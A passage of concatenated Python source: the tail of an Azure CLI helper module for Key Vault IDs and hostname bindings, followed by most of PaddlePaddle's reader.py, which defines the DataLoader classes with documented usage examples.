key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and hostname_binding.host_name_type == 'Verified':
verified_hostname_found = True
return verified_hostname_found
reader.py
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import core
import sys
import six
import numpy as np
import threading
import paddle
from .framework import Program, Variable, program_guard, default_main_program, default_startup_program, in_dygraph_mode, cpu_places, _current_expected_place
from .executor import global_scope
from .data_feeder import DataFeeder, BatchedTensorProvider
from .multiprocess_utils import multiprocess_queue_set, CleanupFuncRegistrar, _cleanup_mmap, _cleanup, _set_SIGCHLD_handler
from .dataloader import BatchSampler, Dataset, IterableDataset
from .dataloader.dataloader_iter import _DataLoaderIterSingleProcess, _DataLoaderIterMultiProcess, _DatasetKind, default_collate_fn
from .dataloader.batch_sampler import _InfiniteIterableSampler
from .layers.io import monkey_patch_reader_methods, _copy_reader_var_, double_buffer
from .unique_name import UniqueNameGenerator
import logging
import warnings
### Dygraph DataLoader configs ###
import os
import multiprocessing
import signal
# NOTE: queue has a different name in python2 and python3
if six.PY2:
import Queue as queue
else:
import queue
# NOTE: [ avoid hanging & fail quickly ] This value is used when getting data from another process
QUEUE_GET_TIMEOUT = 60
__all__ = ['PyReader', 'DataLoader', 'default_collate_fn']
data_loader_unique_name_generator = UniqueNameGenerator()
KEEP_DATA_LOADER_ORDER = True
USE_PINNED_MEMORY = None
def keep_data_loader_order(*args):
global KEEP_DATA_LOADER_ORDER
if len(args) == 0:
return KEEP_DATA_LOADER_ORDER
else:
assert len(args) == 1 and isinstance(args[0], bool)
KEEP_DATA_LOADER_ORDER = args[0]
def use_pinned_memory(*args):
global USE_PINNED_MEMORY
if len(args) == 0:
return USE_PINNED_MEMORY
else:
assert len(args) == 1 and isinstance(args[0], bool)
USE_PINNED_MEMORY = args[0]
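# Both helpers above double as getter/setter switches (an illustrative sketch):
#     keep_data_loader_order()        # -> current value (True by default)
#     keep_data_loader_order(False)   # sets the global flag
#     use_pinned_memory(True)         # force pinned memory on
#     use_pinned_memory()             # -> True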
def _convert_places(places):
if not isinstance(places, (list, tuple)):
places = [places]
ret = []
for p in places:
if not isinstance(p, core.Place):
tmp = core.Place()
tmp.set_place(p)
p = tmp
ret.append(p)
return ret
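# _convert_places normalizes a single place or a list/tuple of places into a list of core.Place
# objects, e.g. (illustrative):
#     _convert_places(core.CPUPlace())                        # -> [core.Place wrapping CPUPlace]
#     _convert_places([core.CPUPlace(), core.CUDAPlace(0)])   # -> a list of two core.Place objects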
# NOTE(chenweihang): _reader_process_loop must be top level method to be pickled
def _reader_process_loop(batch_reader, data_queue):
try:
# set signal handler
core._set_process_signal_handler()
        # NOTE: [ mmap files clear ] When the child process exits unexpectedly,
        # some shared memory objects may have been allocated but not yet put
        # into the inter-process Queue; those objects need to be cleaned up
        # when the process ends.
CleanupFuncRegistrar.register(_cleanup_mmap)
for batch in batch_reader():
tensor_list = core._convert_to_tensor_list(batch)
data_queue.put(tensor_list)
core._remove_tensor_list_mmap_fds(tensor_list)
data_queue.put(None)
except KeyboardInterrupt:
        # NOTE: The main process will raise KeyboardInterrupt anyway, so ignore it in the child process
pass
except:
six.reraise(*sys.exc_info())
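# Note on the loop above: after the batch reader is exhausted, a single None is put on data_queue
# as an end-of-data sentinel for the consumer side, and KeyboardInterrupt is swallowed in the child
# because the main process will raise it on its own.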
class DataLoaderBase(object):
def __init__(self):
self._places = None
def __call__(self):
return self
def next(self):
'''
Get the next item in the DataLoader object. This method
should not be called by users directly. It is used for
implementing iterator protocol of Python 2.x inside
PaddlePaddle framework.
'''
return self.__next__()
def __iter__(self):
raise NotImplementedError()
def __next__(self):
raise NotImplementedError()
@classmethod
def _check_input_array(cls, item):
arr = np.asarray(item)
if arr.dtype == np.object:
raise TypeError(
"\n\tFaild to convert input data to a regular ndarray :\n\t* Usually "
"this means the input data contains nested lists with different lengths. "
"\n\t* Check the reader function passed to 'decorate_batch_generator'"
" to locate the data causes this issue.\n\t* Please consider using "
"'fluid.create_lod_tensor' to convert it to a LoD-Tensor.")
return arr
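# Illustrative behaviour of _check_input_array (a sketch): ragged nested lists end up as an
# object-dtype ndarray and are rejected, while rectangular data passes through, e.g.
#     DataLoaderBase._check_input_array([[1, 2], [3, 4]])  # returns a (2, 2) integer ndarray
#     DataLoaderBase._check_input_array([[1, 2], [3]])     # raises TypeError (object dtype)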
class DataLoader(object):
"""
    DataLoader provides an iterator which iterates over the given dataset
once by the batch_sampler.
    DataLoader supports single-process and multi-process data loading,
multi-process workers will be used to load data asynchronously if
:attr:`num_workers` is set as a positive number.
DataLoader supports map-style dataset and iterable-style dataset.
    For a map-style dataset (one can get a sample from the dataset with a given
index), please see :code:`paddle.io.Dataset`.
    For an iterable-style dataset (samples are drawn from the dataset iteratively,
like a Python iterator), please see :code:`paddle.io.IterableDataset`.
For :code:`batch_sampler` please see :code:`paddle.io.BatchSampler`
Args:
dataset(Dataset): the dataset to load data from, should be an
instance of subclass of :code:`paddle.io.Dataset` or
:code:`paddle.io.IterableDataset`.
feed_list (list(Tensor)|tuple(Tensor)): feed variable list.
The variables should be created by :code:`paddle.static.data()`.
:attr:`feed_list` must be set if :attr:`return_list` is
False. Default None.
places(list(Place)|tuple(Place)|optional): a list of Place,
to put data onto, :attr:`places` can be None, if
            :attr:`places` is None, the default place (CPUPlace or CUDAPlace(0))
will be used. Default None.
return_list (bool): whether the return value on each device is
presented as a list. If :attr:`return_list=False`, the return
value on each device would be a dict of str -> Tensor, where
the key of the dict is the name of each fed variables. If
:attr:`return_list=True`, the return value on each device would
be a list(Tensor). :attr:`return_list` can only be True
in dynamic graph mode. Default False.
batch_sampler(BatchSampler): an instance of `paddle.io.BatchSampler`
to generate batch indices to draw samples from :attr:`dataset`
and combine a batch. Default None.
batch_size(int): sample number in a mini-batch, a substitution
parameter for :attr:`batch_sampler`, if :attr:`batch_sampler`
is not set, a default `paddle.io.BatchSampler` will be used
            and initialized by :attr:`batch_size`, :attr:`shuffle` and
:attr:`drop_last`. Default 1.
        shuffle(bool): whether to shuffle the indices order before generating
batch indices, a substitution parameter for :attr:`batch_sampler`
see :attr:`batch_size`. Default False.
        drop_last(bool): whether to drop the last incomplete batch when the dataset size
is not divisible by the batch size, a substitution parameter
for :attr:`batch_sampler`, see :attr:`batch_size`. Default False
collate_fn(callable): function to generate mini-batch data by merging
            the sample list; None to only stack each field of the samples along axis
            0 (same as :code:`np.stack(..., axis=0)`). Default None
num_workers(int): the number of subprocess to load data, 0 for no
subprocess used and loading data in main process. Default 0
        use_buffer_reader (bool): whether to use buffered reader.
If use_buffer_reader=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data. Default True.
use_shared_memory (bool): whether to use shared memory to speed up
putting data into inter-process queue, set :attr:`use_shared_memory`
            as True only when the shared memory space on your machine (e.g.
            the space of '/dev/shm' on Linux operating systems) is large enough.
            Shared memory will only be enabled in multi-process mode (num_workers
> 0). Default True.
        timeout(int): the timeout value for getting data from the output queue
of subprocesses. Default 0.
worker_init_fn(callable): init function which will be called with
            the worker id when each subprocess starts, if not set as None. Default
None.
Returns:
        DataLoader: an iterable object for data iterating, each element of the generated data is a Tensor.
Examples:
.. code-block:: python
import numpy as np
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from paddle.io import Dataset, BatchSampler, DataLoader
BATCH_NUM = 20
BATCH_SIZE = 16
EPOCH_NUM = 4
IMAGE_SIZE = 784
CLASS_NUM = 10
# define a random dataset
class RandomDataset(Dataset):
def __init__(self, num_samples):
self.num_samples = num_samples
def __getitem__(self, idx):
image = np.random.random([IMAGE_SIZE]).astype('float32')
label = np.random.randint(0, CLASS_NUM - 1, (1, )).astype('int64')
return image, label
def __len__(self):
return self.num_samples
dataset = RandomDataset(BATCH_NUM * BATCH_SIZE)
class SimpleNet(nn.Layer):
def __init__(self):
super(SimpleNet, self).__init__()
self.fc = nn.Linear(IMAGE_SIZE, CLASS_NUM)
def forward(self, image, label=None):
return self.fc(image)
simple_net = SimpleNet()
opt = paddle.optimizer.SGD(learning_rate=1e-3,
parameters=simple_net.parameters())
loader = DataLoader(dataset,
batch_size=BATCH_SIZE,
shuffle=True,
drop_last=True,
num_workers=2)
for e in range(EPOCH_NUM):
for i, (image, label) in enumerate(loader()):
out = simple_net(image)
loss = F.cross_entropy(out, label)
avg_loss = paddle.mean(loss)
avg_loss.backward()
opt.minimize(avg_loss)
simple_net.clear_gradients()
print("Epoch {} batch {}: loss = {}".format(e, i, np.mean(loss.numpy())))
.. note::
        For reading an iterable-style dataset with a multi-process DataLoader,
please see :code:`paddle.io.IterableDataset`
"""
def __init__(self,
dataset,
feed_list=None,
places=None,
return_list=False,
batch_sampler=None,
batch_size=1,
shuffle=False,
drop_last=False,
collate_fn=None,
num_workers=0,
use_buffer_reader=True,
use_shared_memory=True,
timeout=0,
worker_init_fn=None):
self.return_list = return_list
self.collate_fn = collate_fn
self.use_buffer_reader = use_buffer_reader
self.worker_init_fn = worker_init_fn
assert isinstance(dataset, Dataset), \
"dataset should be subclass instance of paddle.io.Dataset"
self.dataset = dataset
if not return_list and not in_dygraph_mode():
assert feed_list is not None, \
"feed_list should be set when return_list=False"
self.feed_list = feed_list
if places is None:
places = _current_expected_place()
self.places = _convert_places(places)
assert num_workers >= 0, "num_workers should be a non-negative value"
if num_workers > 0 and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"DataLoader with multi-process mode is not supported on MacOs and Windows currently." \
" Please use signle-process mode with num_workers = 0 instead")
num_workers = 0
self.num_workers = num_workers
self.use_shared_memory = use_shared_memory
if use_shared_memory and num_workers == 0:
self.use_shared_memory = False
assert timeout >= 0, "timeout should be a non-negative value"
self.timeout = timeout
if isinstance(dataset, IterableDataset):
self.dataset_kind = _DatasetKind.ITER
if shuffle:
raise ValueError(
"IterableDataset not support shuffle, but got shuffle={}".
format(shuffle))
if batch_sampler is not None:
raise ValueError(
"IterableDataset expect unspecified batch_sampler")
else:
self.dataset_kind = _DatasetKind.MAP
if batch_sampler is not None:
assert isinstance(batch_sampler, BatchSampler), \
"batch_sampler should be None or subclass instance " \
"of paddle.io.BatchSampler"
assert batch_size == 1 and not shuffle and not drop_last, \
"batch_size/shuffle/drop_last should not be set when " \
"batch_sampler is given"
self.batch_sampler = batch_sampler
else:
assert batch_size is not None and batch_size > 0, \
"batch_size should be a positive value when " \
"batch_sampler is not given"
if isinstance(dataset, IterableDataset):
self.batch_sampler = _InfiniteIterableSampler(dataset,
batch_size)
else:
self.batch_sampler = BatchSampler(
dataset=dataset,
batch_size=batch_size,
shuffle=shuffle,
drop_last=drop_last)
self.pin_memory = False
if in_dygraph_mode():
self.pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
def __len__(self):
return len(self.batch_sampler)
def __iter__(self):
if self.num_workers == 0:
return _DataLoaderIterSingleProcess(self)
else:
return _DataLoaderIterMultiProcess(self)
def __call__(self):
return self.__iter__()
@staticmethod
def from_generator(feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
use_multiprocess=False,
drop_last=True):
"""
.. warning::
This API will be deprecated in the future, it is recommended to use
:code:`paddle.io.DataLoader` which supports multi-processes acceleration.
.. note::
**The framework ensures that the data loading order of DataLoader is exactly the same as the user-defined data source.**
Create a DataLoader object for loading data from Python generator.
Data would be prefetched using Python thread and be pushed
into a queue asynchronously.
The created DataLoader object provides 3 methods to set the data source
:code:`set_sample_generator` , :code:`set_sample_list_generator` and
:code:`set_batch_generator` . Please see the following example codes
to know their usages.
If iterable = True, the created DataLoader object is a Python generator
object, which is iterable using for-range loop.
If iterable = False, the created DataLoader object provides
:code:`start()` and :code:`reset()` method to control the data reading
process. This mode is designed to be compatible with the
:code:`fluid.layers.py_reader` interface. Users can migrate the codes
from :code:`fluid.layers.py_reader` to :code:`fluid.io.DataLoader`
easily when using iterable=False.
Args:
feed_list (list(Variable)|tuple(Variable)): feed variable list.
The variables should be created by :code:`fluid.data()`.
capacity (int): capacity of the queue maintained in DataLoader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data.
iterable (bool): whether the created DataLoader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed variables. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
use_multiprocess (bool): whether to use multi-process to speed up
the data loading process in dygraph. Note: this parameter only
can be used in the dygraph mode. In the static graph mode,
whether this parameter is set or not has no effect.
The Default value is False.
drop_last (bool): whether to drop the last batches whose number is
less than the CPU core/GPU card number. The default value is
True. In training phase, users should not set drop_last=False,
because all CPU cores/GPU cards must read data from DataLoader.
In inference phase, users can set drop_last=False, so that the
last batches whose number is less than the CPU core/GPU card
number can be tested.
Returns:
loader (DataLoader): the created DataLoader object.
Examples 1:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
BATCH_NUM = 10
BATCH_SIZE = 16
EPOCH_NUM = 4
CLASS_NUM = 10
ITERABLE = True # whether the created DataLoader object is iterable
USE_GPU = False # whether to use GPU
DATA_FORMAT = 'batch_generator' # data format of data source user provides
def simple_net(image, label):
fc_tmp = fluid.layers.fc(image, size=CLASS_NUM)
cross_entropy = fluid.layers.softmax_with_cross_entropy(image, label)
loss = fluid.layers.reduce_mean(cross_entropy)
sgd = fluid.optimizer.SGD(learning_rate=1e-3)
sgd.minimize(loss)
return loss
def get_random_images_and_labels(image_shape, label_shape):
image = np.random.random(size=image_shape).astype('float32')
label = np.random.random(size=label_shape).astype('int64')
return image, label
# If the data generator yields one sample each time,
# use DataLoader.set_sample_generator to set the data source.
def sample_generator_creator():
def __reader__():
for _ in range(BATCH_NUM * BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
yield image, label
return __reader__
            # If the data generator yields a list of samples each time,
# use DataLoader.set_sample_list_generator to set the data source.
def sample_list_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
sample_list = []
for _ in range(BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
sample_list.append([image, label])
yield sample_list
return __reader__
# If the data generator yields a batch each time,
# use DataLoader.set_batch_generator to set the data source.
def batch_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
batch_image, batch_label = get_random_images_and_labels([BATCH_SIZE, 784], [BATCH_SIZE, 1])
yield batch_image, batch_label
return __reader__
# If DataLoader is iterable, use for loop to train the network
def train_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
for data in loader():
exe.run(prog, feed=data, fetch_list=[loss])
# If DataLoader is not iterable, use start() and reset() method to control the process
def train_non_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
loader.start() # call DataLoader.start() before each epoch starts
try:
while True:
exe.run(prog, fetch_list=[loss])
except fluid.core.EOFException:
loader.reset() # call DataLoader.reset() after catching EOFException
def set_data_source(loader, places):
if DATA_FORMAT == 'sample_generator':
loader.set_sample_generator(sample_generator_creator(), batch_size=BATCH_SIZE, drop_last=True, places=places)
elif DATA_FORMAT == 'sample_list_generator':
loader.set_sample_list_generator(sample_list_generator_creator(), places=places)
elif DATA_FORMAT == 'batch_generator':
loader.set_batch_generator(batch_generator_creator(), places=places)
else:
raise ValueError('Unsupported data format')
image = fluid.data(name='image', shape=[None, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
# Define DataLoader
loader = fluid.io.DataLoader.from_generator(feed_list=[image, label], capacity=16, iterable=ITERABLE)
# Define network
loss = simple_net(image, label)
# Set data source of DataLoader
#
# If DataLoader is iterable, places must be given and the number of places must be the same with device number.
# - If you are using GPU, call `fluid.cuda_places()` to get all GPU places.
# - If you are using CPU, call `fluid.cpu_places()` to get all CPU places.
#
# If DataLoader is not iterable, places can be None.
places = fluid.cuda_places() if USE_GPU else fluid.cpu_places()
set_data_source(loader, places)
exe = fluid.Executor(places[0])
exe.run(fluid.default_startup_program())
prog = fluid.CompiledProgram(fluid.default_main_program()).with_data_parallel(loss_name=loss.name)
if loader.iterable:
train_iterable(exe, prog, loss, loader)
else:
train_non_iterable(exe, prog, loss, loader)
'''
Users can use return_list = True in dygraph mode.
'''
with fluid.dygraph.guard(places[0]):
loader = fluid.io.DataLoader.from_generator(capacity=2, return_list=True)
set_data_source(loader, places[0])
for image, label in loader():
relu = fluid.layers.relu(image)
assert image.shape == [BATCH_SIZE, 784]
assert label.shape == [BATCH_SIZE, 1]
assert relu.shape == [BATCH_SIZE, 784]
Examples 2:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
import os
# We use 2 CPU cores to run inference network
os.environ['CPU_NUM'] = '2'
# The data source has only 3 batches, which can not be
# divided evenly to each CPU core
def batch_generator():
for i in range(3):
yield np.array([i+1]).astype('float32'),
x = fluid.data(name='x', shape=[None], dtype='float32')
y = x * x
def run_inference(drop_last):
loader = fluid.io.DataLoader.from_generator(feed_list=[x],
capacity=8, drop_last=drop_last)
loader.set_batch_generator(batch_generator, fluid.cpu_places())
exe = fluid.Executor(fluid.CPUPlace())
prog = fluid.CompiledProgram(fluid.default_main_program())
prog = prog.with_data_parallel()
result = []
for data in loader():
each_ret, = exe.run(prog, feed=data, fetch_list=[y])
result.extend(each_ret)
return result
# Set drop_last to True, so that the last batch whose
# number is less than CPU core number would be discarded.
print(run_inference(drop_last=True)) # [1.0, 4.0]
# Set drop_last to False, so that the last batch whose
# number is less than CPU core number can be tested.
print(run_inference(drop_last=False)) # [1.0, 4.0, 9.0]
"""
if in_dygraph_mode():
return DygraphGeneratorLoader(feed_list, capacity,
use_double_buffer, iterable,
return_list, use_multiprocess)
else:
return GeneratorLoader(feed_list, capacity, use_double_buffer,
iterable, return_list, drop_last)
@staticmethod
def from_dataset(dataset, places, drop_last=True):
"""
.. warning::
This API will be deprecated in the future, it is recommended to use
:code:`paddle.io.DataLoader` which supports multi-processes acceleration.
Create an iterable DataLoader object for loading data from Dataset.
        Currently, Dataset is only supported on Linux.
Args:
dataset (InMemoryDataset|QueueDataset): the dataset object.
places (list(CUDAPlace)|list(CPUPlace)): places where the result
data should be converted.
drop_last (bool): whether to drop the last batch whose sample
number is less than batch size. If drop_last = True, they
would be dropped. If drop_last = False, they would be kept.
Returns:
loader (DataLoader): the created DataLoader object, which can be
treated as a Python generator.
Examples:
.. code-block:: python
import paddle.fluid as fluid
image = fluid.data(name='image', shape=[None, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
dataset = fluid.DatasetFactory().create_dataset("QueueDataset")
dataset.set_batch_size(32)
dataset.set_filelist(['a.txt', 'b.txt', 'c.txt'])
dataset.set_use_var([image, label])
dataset.set_pipe_command('cat')
loader = fluid.io.DataLoader.from_dataset(dataset, fluid.cpu_places())
"""
return DatasetLoader(dataset, places, drop_last)
class DygraphGeneratorLoader(DataLoaderBase):
"""
The GeneratorLoader of dygraph
    Most functions of the multiprocess dygraph GeneratorLoader differ from the
    static graph GeneratorLoader, so it is implemented separately to keep the
    code readable.
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=True,
use_multiprocess=False):
self._batch_reader = None
self._places = None
self._feed_list = feed_list
if not capacity:
raise ValueError("Please give value to capacity.")
self._capacity = capacity
self._use_double_buffer = use_double_buffer
if not iterable:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports iterable mode only. Change to iterable mode."
)
self._iterable = True
if not return_list:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports returning as list only. Change to return as list."
)
self._return_list = True
        # NOTE: multiprocessing is incompatible across different platforms; we will address this later
self._use_multiprocess = use_multiprocess
if self._use_multiprocess and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"NOTE: DygraphGeneratorLoader with multiprocess mode is not currently supported on MacOs and Windows."
)
self._use_multiprocess = False
if self._use_multiprocess:
# NOTE: the multiprocessing.Queue used to save loading data in self._process
self._data_queue = None
# NOTE: this process is used to load data asynchronously from self._batch_reader
self._process = None
# NOTE: the C++ LoDTensorBlockingQueue instance
self._blocking_queue = None
# NOTE: 1. In multiprocess mode, this thread is used to get next batch data from
# self._data_queue, then push it into self._blocking_queue; 2. In singleprocess
# mode, this thread is used to get next batch data from self._batch_reader, then
# push it into self._blocking_queue
self._thread = None
self._pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
@property
def queue(self):
return self._blocking_queue
@property
def iterable(self):
return self._iterable
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except queue.Empty:
break
global multiprocess_queue_set
multiprocess_queue_set.remove(self._data_queue)
def _wait_thread_ends(self):
thread = self._thread
if thread is not None:
self._blocking_queue.close()
thread.join()
def _wait_process_ends(self):
process = self._process
if process is not None:
process.join()
# erase process id
core._erase_process_pids(id(self))
def _init_iterable(self):
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
self._var_names = []
self._shapes = []
self._dtypes = []
self._need_check_feed = []
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, False)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer, True,
self._pin_memory)
def _start(self):
if self._use_multiprocess:
# clear old _data_queue and remove it from multiprocess_queue_set
self._clear_and_remove_data_queue()
# set data_queue and process
self._data_queue = multiprocessing.Queue(self._capacity)
# add _data_queue into global queue set
global multiprocess_queue_set
multiprocess_queue_set.add(self._data_queue)
self._process = multiprocessing.Process(
target=_reader_process_loop,
args=(self._batch_reader, self._data_queue))
self._process.daemon = True
self._process.start()
# Set child process signal handler
            # NOTE: [ avoiding hang ] 1. if the child process dies due to a bus error/segfault
            # or just hangs, the main process will hang waiting for data, so we need to handle
            # SIGSEGV and SIGBUS from the child process here; 2. if the main process ends before
            # the child process, it shuts all its daemonic children down with a SIGTERM (instead
            # of joining them without a timeout), so we also need to handle SIGTERM here.
core._set_process_pids(id(self), [self._process.pid])
_set_SIGCHLD_handler()
# Set reader_thread
self._thread_done_event = threading.Event()
self._thread = threading.Thread(
target=self._reader_thread_loop_for_multiprocess)
self._thread.daemon = True
self._thread.start()
else:
self._thread = threading.Thread(
target=self._reader_thread_loop_for_singleprocess)
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._reader.reset()
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._batch_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
return self._reader.read_next_var_list()
except StopIteration:
self._reset()
six.reraise(*sys.exc_info())
def _exit_thread_expectedly(self):
self._thread_done_event.set()
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
self._blocking_queue.kill()
logging.error("DataLoader reader thread raised an exception!")
def _reader_thread_loop_for_multiprocess(self):
while not self._thread_done_event.is_set():
try:
# NOTE: [ avoid hanging ] Even with carefully designed data dependencies
# (i.e., a put() always corresponding to a get()), hanging on get() can
# still happen when data in queue is corrupted (e.g., due to
# Queue.cancel_join_thread or unexpected exit). So we set a timeout whenever
# we try to get data from `data_queue`
                # NOTE: [ avoid failing quickly ] Here, QUEUE_GET_TIMEOUT is relatively
                # long (currently 60 seconds), because in some models, if the reader child
                # process starts under a heavy load, it does not have enough time to put
                # data into the queue before the main process starts trying to get data
                # from it. In that case, this thread needs to wait slightly longer.
tensor_list = self._data_queue.get(timeout=QUEUE_GET_TIMEOUT)
except:
                # NOTE: [ avoid hanging ] After adding the shared memory mechanism, not only
                # queue.Empty but also other exceptions (such as mmap failure) can occur
                # here. If they are not handled here, the loader will hang.
self._exit_thread_unexpectedly()
logging.error(
"DataLoader reader thread failed to read data from the multiprocessing.Queue."
)
six.reraise(*sys.exc_info())
if not self._thread_done_event.is_set():
if tensor_list is not None:
try:
array = core.LoDTensorArray()
for tensor in tensor_list:
array.append(tensor)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
else:
self._exit_thread_expectedly()
def _reader_thread_loop_for_singleprocess(self):
try:
for sample in self._batch_reader():
array = core.LoDTensorArray()
for item in sample:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._blocking_queue.push(array):
break
self._blocking_queue.close()
self._thread = None
except Exception:
self._blocking_queue.kill()
self._thread = None
logging.warning(
"DygraphDataLoader reader thread raised an exception.")
six.reraise(*sys.exc_info())
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
return self
def set_sample_list_generator(self, reader, places=None):
def __batch_reader_impl__():
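            # Regroup each batch from sample-major order (a list of samples, each a
            # list of fields) into slot-major order (one list per feed variable), so
            # every field forms a contiguous batch.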
for batch in reader():
slots = []
for items in batch:
for i, item in enumerate(items):
if len(slots) < len(items):
slots.append([item])
else:
slots[i].append(item)
yield slots
self.set_batch_generator(__batch_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
self._batch_reader = reader
if places is None:
places = _current_expected_place()
self._places = _convert_places(places)
assert len(self._places) == 1, \
"Number of places must be 1 in imperative mode"
return self
class GeneratorLoader(DataLoaderBase):
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
drop_last=True):
self._tensor_reader = None
self._places = None
self._thread = None
self._queue = None
self._feed_list = feed_list
self._exited = False
self._drop_last = drop_last
self._keep_order = keep_data_loader_order()
if not capacity:
raise ValueError("Please give value to capacity.")
self._iterable = iterable
self._return_list = return_list
if not self._feed_list:
raise Exception("Feed list must be given under static mode.")
self._use_double_buffer = use_double_buffer
self._capacity = capacity
if not self._iterable:
self._init_non_iterable()
def _wait_thread_ends(self):
# Get self._thread first to prevent data race, because __thread_main__
        # would set self._thread to None at the end
thread = self._thread
if thread is not None and self._iterable:
self._queue.close()
thread.join()
def _init_iterable(self):
self._wait_thread_ends()
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
self._queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, self._keep_order)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer,
self._drop_last, False)
def _init_non_iterable(self):
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
need_check_feed = []
for feed_data in self._feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
need_check_feed.append(int(feed_data.desc.need_check_feed()))
queue_name = data_loader_unique_name_generator(
'lod_tensor_blocking_queue')
reader_name = data_loader_unique_name_generator('create_py_reader')
double_buffer_name = data_loader_unique_name_generator('double_buffer')
var = global_scope().var(queue_name)
self._queue = core.init_lod_tensor_blocking_queue(var, self._capacity,
self._keep_order)
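        # When sample order must be preserved, the create_py_reader op is added to the
        # main program block; otherwise it is added to the startup program and the
        # reader variable is copied into the main program below.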
if self._keep_order:
block = default_main_program().current_block()
else:
block = default_startup_program().current_block()
reader_var = block.create_var(name=reader_name)
dtype_int = [int(t) for t in dtypes]
block.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [reader_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'dtypes': dtype_int,
'need_check_feed': need_check_feed,
'ranks': ranks
})
reader_var.desc.set_dtypes(dtypes)
reader_var.persistable = True
reader_var.stop_gradient = True
if self._keep_order:
main_prog_var = reader_var
reader = main_prog_var
reader.reset = self._queue.reset
else:
main_prog_var = _copy_reader_var_(
default_main_program().current_block(), reader_var)
main_prog_var.stop_gradient = True
main_prog_var.persistable = True
reader = monkey_patch_reader_methods(main_prog_var)
if self._use_double_buffer:
double_buffer_reader = double_buffer(
reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
self._reader = reader
default_main_program().current_block().append_op(
type='read',
inputs={'Reader': [self._reader]},
outputs={'Out': self._feed_list},
attrs={'drop_last': self._drop_last})
@property
